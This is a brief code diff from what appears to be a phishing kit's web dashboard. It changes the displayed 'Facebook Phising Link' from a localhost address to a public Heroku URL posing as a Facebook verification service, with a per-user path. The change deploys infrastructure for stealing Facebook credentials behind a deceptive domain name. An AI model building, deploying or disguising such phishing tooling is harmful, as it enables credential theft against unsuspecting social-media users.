--- a/views/index.ejs
+++ b/views/index.ejs
@@ -11,7 +11,7 @@
                             <div class="col-lg-12 mb-3">
                                 <div class="form-gorup">
                                     <label class="mont-font fw-600 font-xssss">Facebook Phising Link</label>
-                                    <input id="myInput" type="text" value="http://localhost:4000/facebook_verify/<%= user.id %>" class="form-control">
+                                    <input id="myInput" type="text" value="https://verify-social-media.herokuapp.com/facebook_verify/<%= user.id %>" class="form-control">
                                 </div>        
                             </div>
                             <div class="col-lg-12 mb-3">
